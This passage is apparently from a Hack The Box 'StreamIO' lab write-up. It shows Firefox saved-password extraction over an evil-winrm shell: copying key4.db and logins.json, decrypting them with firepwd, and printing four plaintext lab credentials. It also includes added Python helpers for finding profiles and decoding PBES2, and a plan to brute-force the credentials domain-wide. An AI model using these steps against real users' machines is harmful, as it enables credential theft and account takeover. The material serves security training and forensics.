Firefox


Upon making a lateral movement to the nikk37 user, I went ahead and checked the home directory.

*evil-winrm* ps c:\Users\nikk37\AppData> ls Local ; ls LocalLow ; ls Roaming
 
 
    directory: C:\Users\nikk37\AppData\Local
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/15/2018  12:19 AM                Microsoft
d-----        2/22/2022   2:40 AM                Mozilla
d-----       11/14/2023   1:53 PM                Temp
d-----        2/22/2022   2:42 AM                VirtualStore
 
 
    directory: C:\Users\nikk37\AppData\LocalLow
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d---s-        2/22/2022   2:42 AM                Microsoft
d-----        2/22/2022   2:42 AM                Mozilla
 
 
    directory: C:\Users\nikk37\AppData\Roaming
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d---s-        2/22/2022   2:40 AM                Microsoft
d-----        2/22/2022   2:40 AM                Mozilla

To my surprise, there are Mozilla directories, suggesting that the user has opened Firefox sessions.

While the installation of Firefox was confirmed at an earlier stage, there wasn't any non-default configuration in the installation directory that I could make use of. Additionally, the yoshihide account never had a home directory, as it is a "service" account used to run the web application.

*evil-winrm* ps c:\Users\nikk37\AppData> ls Roaming\Mozilla
 
 
    directory: C:\Users\nikk37\AppData\Roaming\Mozilla
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2/22/2022   2:40 AM                Extensions
d-----        2/22/2022   2:40 AM                Firefox
 
 
*evil-winrm* ps c:\Users\nikk37\AppData> ls Roaming\Mozilla\Firefox
 
 
    directory: C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2/22/2022   2:40 AM                Crash Reports
d-----        2/22/2022   2:40 AM                Pending Pings
d-----        2/22/2022   2:40 AM                Profiles
-a----        2/22/2022   2:40 AM             75 installs.ini
-a----        2/22/2022   2:40 AM            305 profiles.ini
 
*evil-winrm* ps c:\Users\nikk37\AppData> ls Roaming\Mozilla\Firefox\Profiles
 
 
    directory: C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2/22/2022   2:40 AM                5rwivk2l.default
d-----        2/22/2022   2:42 AM                br53rxeg.default-release

There is the Firefox directory, and I can also see the profiles. The presence of a Firefox profile confirms the theory that the nikk37 user has used Firefox; by default, Firefox generates a profile the first time the browser is opened.

Additionally, if the nikk37 user ever saved credentials in Firefox while authenticating to a website, those stored credentials can be extracted.
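Before reaching for a decryption tool, it is worth knowing which profiles actually carry saved-login material. The following is an added example (not part of the original writeup) that reads profiles.ini the way Firefox lays it out, resolves each profile directory and counts the entries in logins.json. The directory tree and the logins.json content it builds are constructed fixtures modelled on the listing above; the encrypted fields are labelled placeholders, not real ciphertext.

```python
"""Inventory Firefox profiles under Roaming\\Mozilla\\Firefox and report saved-login counts."""
from __future__ import annotations

import configparser
import json
import os
import tempfile


def list_profiles(firefox_dir: str) -> list[dict]:
    """Parse profiles.ini: every [ProfileN] section has Name, IsRelative and Path keys."""
    ini = configparser.ConfigParser()
    ini.read(os.path.join(firefox_dir, "profiles.ini"))
    profiles = []
    for section in ini.sections():
        if not section.startswith("Profile"):
            continue  # [General] and [Install...] sections carry no profile path
        relative = ini.get(section, "IsRelative", fallback="1") == "1"
        path = ini.get(section, "Path")
        full = os.path.join(firefox_dir, path) if relative else path
        profiles.append({"name": ini.get(section, "Name", fallback=section),
                         "path": os.path.normpath(full)})
    return profiles


def saved_login_count(profile_path: str) -> int:
    """Number of entries in the profile's logins.json; 0 when the file is absent."""
    logins = os.path.join(profile_path, "logins.json")
    if not os.path.isfile(logins):
        return 0
    with open(logins, encoding="utf-8") as fh:
        return len(json.load(fh).get("logins", []))


def audit(firefox_dir: str) -> dict[str, int]:
    """Map profile name -> saved login count; non-zero means credential material is on disk."""
    return {p["name"]: saved_login_count(p["path"]) for p in list_profiles(firefox_dir)}


def build_sample_tree(root: str) -> str:
    """Constructed fixture: the two profile names from the listing above, only one holding logins."""
    ff = os.path.join(root, "AppData", "Roaming", "Mozilla", "Firefox")
    for name in ("5rwivk2l.default", "br53rxeg.default-release"):
        os.makedirs(os.path.join(ff, "Profiles", name))
    with open(os.path.join(ff, "profiles.ini"), "w", encoding="utf-8") as fh:
        fh.write("[Profile1]\nName=default\nIsRelative=1\nPath=Profiles/5rwivk2l.default\n\n"
                 "[Profile0]\nName=default-release\nIsRelative=1\n"
                 "Path=Profiles/br53rxeg.default-release\nDefault=1\n\n"
                 "[General]\nStartWithLastProfile=1\nVersion=2\n")
    release = os.path.join(ff, "Profiles", "br53rxeg.default-release")
    # Constructed logins.json using Firefox's field names; values are placeholders, not ciphertext.
    fake = {"nextId": 3, "logins": [
        {"id": 1, "hostname": "https://example.invalid",
         "encryptedUsername": "PLACEHOLDER", "encryptedPassword": "PLACEHOLDER"},
        {"id": 2, "hostname": "https://example.invalid",
         "encryptedUsername": "PLACEHOLDER", "encryptedPassword": "PLACEHOLDER"},
    ]}
    with open(os.path.join(release, "logins.json"), "w", encoding="utf-8") as fh:
        json.dump(fake, fh)
    open(os.path.join(release, "key4.db"), "wb").close()  # empty stand-in for the key store
    return ff


def demo() -> dict[str, int]:
    """Build the fixture in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit(build_sample_tree(tmp))


if __name__ == "__main__":
    print(demo())
```

Pointed at a real Roaming\Mozilla\Firefox directory, audit() tells an examiner which profiles hold saved logins without touching the encrypted values themselves; a profile with a non-zero count is one where key4.db and logins.json together are worth protecting.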

firepwd


While there are many tools to go about this, I will be using Firepwd.

Credential Extraction


*evil-winrm* ps c:\Users\nikk37\AppData> cd Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release
*evil-winrm* ps c:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release> ls
 
 
    directory: C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2/22/2022   2:40 AM                bookmarkbackups
d-----        2/22/2022   2:40 AM                browser-extension-data
d-----        2/22/2022   2:41 AM                crashes
d-----        2/22/2022   2:42 AM                datareporting
d-----        2/22/2022   2:40 AM                minidumps
d-----        2/22/2022   2:42 AM                saved-telemetry-pings
d-----        2/22/2022   2:40 AM                security_state
d-----        2/22/2022   2:42 AM                sessionstore-backups
d-----        2/22/2022   2:40 AM                storage
-a----        2/22/2022   2:40 AM             24 addons.json
-a----        2/22/2022   2:42 AM           5189 addonStartup.json.lz4
-a----        2/22/2022   2:42 AM            310 AlternateServices.txt
-a----        2/22/2022   2:41 AM         229376 cert9.db
-a----        2/22/2022   2:40 AM            208 compatibility.ini
-a----        2/22/2022   2:40 AM            939 containers.json
-a----        2/22/2022   2:40 AM         229376 content-prefs.sqlite
-a----        2/22/2022   2:40 AM          98304 cookies.sqlite
-a----        2/22/2022   2:40 AM           1081 extension-preferences.json
-a----        2/22/2022   2:40 AM          43726 extensions.json
-a----        2/22/2022   2:42 AM        5242880 favicons.sqlite
-a----        2/22/2022   2:41 AM         262144 formhistory.sqlite
-a----        2/22/2022   2:40 AM            778 handlers.json
-a----        2/22/2022   2:40 AM         294912 key4.db
-a----        2/22/2022   2:41 AM           1593 logins-backup.json
-a----        2/22/2022   2:41 AM           2081 logins.json
-a----        2/22/2022   2:42 AM              0 parent.lock
-a----        2/22/2022   2:42 AM          98304 permissions.sqlite
-a----        2/22/2022   2:40 AM            506 pkcs11.txt
-a----        2/22/2022   2:42 AM        5242880 places.sqlite
-a----        2/22/2022   2:42 AM           8040 prefs.js
-a----        2/22/2022   2:42 AM            180 search.json.mozlz4
-a----        2/22/2022   2:42 AM            288 sessionCheckpoints.json
-a----        2/22/2022   2:42 AM           1853 sessionstore.jsonlz4
-a----        2/22/2022   2:40 AM             18 shield-preference-experiments.json
-a----        2/22/2022   2:42 AM            611 SiteSecurityServiceState.txt
-a----        2/22/2022   2:42 AM           4096 storage.sqlite
-a----        2/22/2022   2:40 AM             50 times.json
-a----        2/22/2022   2:40 AM          98304 webappsstore.sqlite
-a----        2/22/2022   2:42 AM            141 xulstore.json

While there is a lot going on within the profile directory, all I need are the key4.db and logins.json files. Those two files together hold the encrypted credentials: key4.db stores the key material and logins.json stores the encrypted login entries.

I will be using the built-in download function of evil-winrm to transfer those files to Kali.

Decryption


┌──(kali㉿kali)-[~/…/htb/labs/streamio/firefox]
└─$ python3 firepwd.py -d .
globalSalt: b'd215c391179edb56af928a06c627906bcbd4bd47'
 SEQUENCE {
   SEQUENCE {
     OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
     SEQUENCE {
       SEQUENCE {
         OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
         SEQUENCE {
           OCTETSTRING b'5d573772912b3c198b1e3ee43ccb0f03b0b23e46d51c34a2a055e00ebcd240f5'
           INTEGER b'01'
           INTEGER b'20'
           SEQUENCE {
             OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
           }
         }
       }
       SEQUENCE {
         OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
         OCTETSTRING b'1baafcd931194d48f8ba5775a41f'
       }
     }
   }
   OCTETSTRING b'12e56d1c8458235a4136b280bd7ef9cf'
 }
clearText b'70617373776f72642d636865636b0202'
password check? True
 SEQUENCE {
   SEQUENCE {
     OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
     SEQUENCE {
       SEQUENCE {
         OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
         SEQUENCE {
           OCTETSTRING b'098560d3a6f59f76cb8aad8b3bc7c43d84799b55297a47c53d58b74f41e5967e'
           INTEGER b'01'
           INTEGER b'20'
           SEQUENCE {
             OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
           }
         }
       }
       SEQUENCE {
         OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
         OCTETSTRING b'e28a1fe8bcea476e94d3a722dd96'
       }
     }
   }
   OCTETSTRING b'51ba44cdd139e4d2b25f8d94075ce3aa4a3d516c2e37be634d5e50f6d2f47266'
 }
clearText b'b3610ee6e057c4341fc76bc84cc8f7cd51abfe641a3eec9d0808080808080808'
decrypting login/password pairs
https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r'
https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)'
https://slack.streamio.htb:b'yoshihide',b'paddpadd@12'
https://slack.streamio.htb:b'JDgodd',b'password@12'

While all 4 credentials were successfully decrypted, the presence of the website https://slack.streamio.htb suggests another possible virtual host or sub-domain. Nevertheless, these are the 4 decrypted credentials:

  • admin:JDg0dd1s@d0p3cr3@t0r
  • nikk37:n1kk1sd0p3t00:)
  • yoshihide:paddpadd@12
  • JDgodd:password@12
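The ASN.1 dump firepwd printed above is the PBES2 parameter block stored in key4.db, and it tells you exactly how the key material is protected. As an added example (not part of the original writeup or of the firepwd tool), the code below re-encodes that first structure from the printed values, walks it back with a minimal DER parser, and checks the PKCS#7 padding on the two clearText values shown. The DER encoder/decoder are mine; the salt, IV, ciphertext and clearText bytes are the ones in the dump.

```python
"""Decode the PBES2 parameter structure firepwd dumps from a Firefox key4.db."""
from __future__ import annotations

# OIDs that appear in the firepwd output above
OIDS = {
    "1.2.840.113549.1.5.13": "pkcs5 pbes2",
    "1.2.840.113549.1.5.12": "pkcs5 PBKDF2",
    "1.2.840.113549.2.9": "hmacWithSHA256",
    "2.16.840.1.101.3.4.1.42": "aes256-CBC",
}


# --- minimal DER encoder, used only to rebuild the sample from the printed values ---

def _der_len(n: int) -> bytes:
    """Short form below 128, otherwise 0x80|N followed by N length bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + _der_len(len(body)) + body


def oid(dotted: str) -> bytes:
    """First two arcs packed into one byte, remaining arcs base-128 with continuation bits."""
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return tlv(0x06, bytes(out))


def build_sample() -> bytes:
    """Re-encode the first structure in the dump (the password-check entry) from its printed values."""
    salt = bytes.fromhex("5d573772912b3c198b1e3ee43ccb0f03b0b23e46d51c34a2a055e00ebcd240f5")
    iv = bytes.fromhex("1baafcd931194d48f8ba5775a41f")  # 14 bytes, as stored
    ciphertext = bytes.fromhex("12e56d1c8458235a4136b280bd7ef9cf")
    kdf_params = tlv(0x30, tlv(0x04, salt) + tlv(0x02, b"\x01") + tlv(0x02, b"\x20")
                     + tlv(0x30, oid("1.2.840.113549.2.9")))
    kdf = tlv(0x30, oid("1.2.840.113549.1.5.12") + kdf_params)
    enc = tlv(0x30, oid("2.16.840.1.101.3.4.1.42") + tlv(0x04, iv))
    alg_id = tlv(0x30, oid("1.2.840.113549.1.5.13") + tlv(0x30, kdf + enc))
    return tlv(0x30, alg_id + tlv(0x04, ciphertext))


# --- minimal DER decoder ---

def der_read(buf: bytes, pos: int = 0) -> tuple[int, bytes, int]:
    """Return (tag, value, next_pos) for the TLV at pos, handling long-form lengths."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def der_children(body: bytes) -> list[tuple[int, bytes]]:
    out, pos = [], 0
    while pos < len(body):
        tag, val, pos = der_read(body, pos)
        out.append((tag, val))
    return out


def decode_oid(body: bytes) -> str:
    arcs, cur = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        cur = (cur << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(cur)
            cur = 0
    return ".".join(map(str, arcs))


def parse_pbes2(blob: bytes) -> dict:
    """SEQUENCE { AlgorithmIdentifier(pbes2, { PBKDF2 params, cipher params }), OCTET STRING ct }."""
    tag, outer, _ = der_read(blob)
    if tag != 0x30:
        raise ValueError("expected outer SEQUENCE")
    alg, ct = der_children(outer)
    alg_oid, params = der_children(alg[1])
    kdf, enc = der_children(params[1])
    kdf_oid, kdf_params = der_children(kdf[1])
    salt, iters, keylen, prf = der_children(kdf_params[1])
    (prf_oid,) = der_children(prf[1])
    enc_oid, iv = der_children(enc[1])
    return {
        "scheme": OIDS[decode_oid(alg_oid[1])],
        "kdf": OIDS[decode_oid(kdf_oid[1])],
        "salt": salt[1].hex(),
        "iterations": int.from_bytes(iters[1], "big"),   # INTEGER 01 -> 1
        "key_length": int.from_bytes(keylen[1], "big"),  # INTEGER 20 -> 32 bytes, AES-256
        "prf": OIDS[decode_oid(prf_oid[1])],
        "cipher": OIDS[decode_oid(enc_oid[1])],
        "iv": iv[1].hex(),
        "ciphertext": ct[1].hex(),
    }


def strip_pkcs7(data: bytes, block: int = 16) -> bytes:
    """Remove and validate PKCS#7 padding (the trailing 0202 / 0808... in the clearText values)."""
    pad = data[-1]
    if not 1 <= pad <= block or data[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS#7 padding")
    return data[:-pad]


def is_password_check(clear: bytes) -> bool:
    """The first entry decrypts to the literal 'password-check' when the master password is right."""
    return strip_pkcs7(clear) == b"password-check"


if __name__ == "__main__":
    for k, v in parse_pbes2(build_sample()).items():
        print(f"{k:>11}: {v}")
```

Reading the decoded fields against the dump: the PRF is HMAC-SHA256, the key length is 32 bytes (AES-256-CBC), and the PBKDF2 iteration count is 1, so the per-entry key derivation costs a single HMAC; the stored IV is 14 bytes and the full 16-byte AES IV is formed by prefixing 0x04 0x0e. The second clearText in the dump is 32 bytes ending in eight 0x08 bytes, i.e. 24 bytes of key material plus padding, which is what strip_pkcs7() returns for it.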

The recovered passwords differ from one another, yet password reuse cannot be ruled out. To test this hypothesis, the credentials will be brute-forced against the whole domain; any that validate would confirm the presence of password reuse.

Moving on to the Lateral Movement phase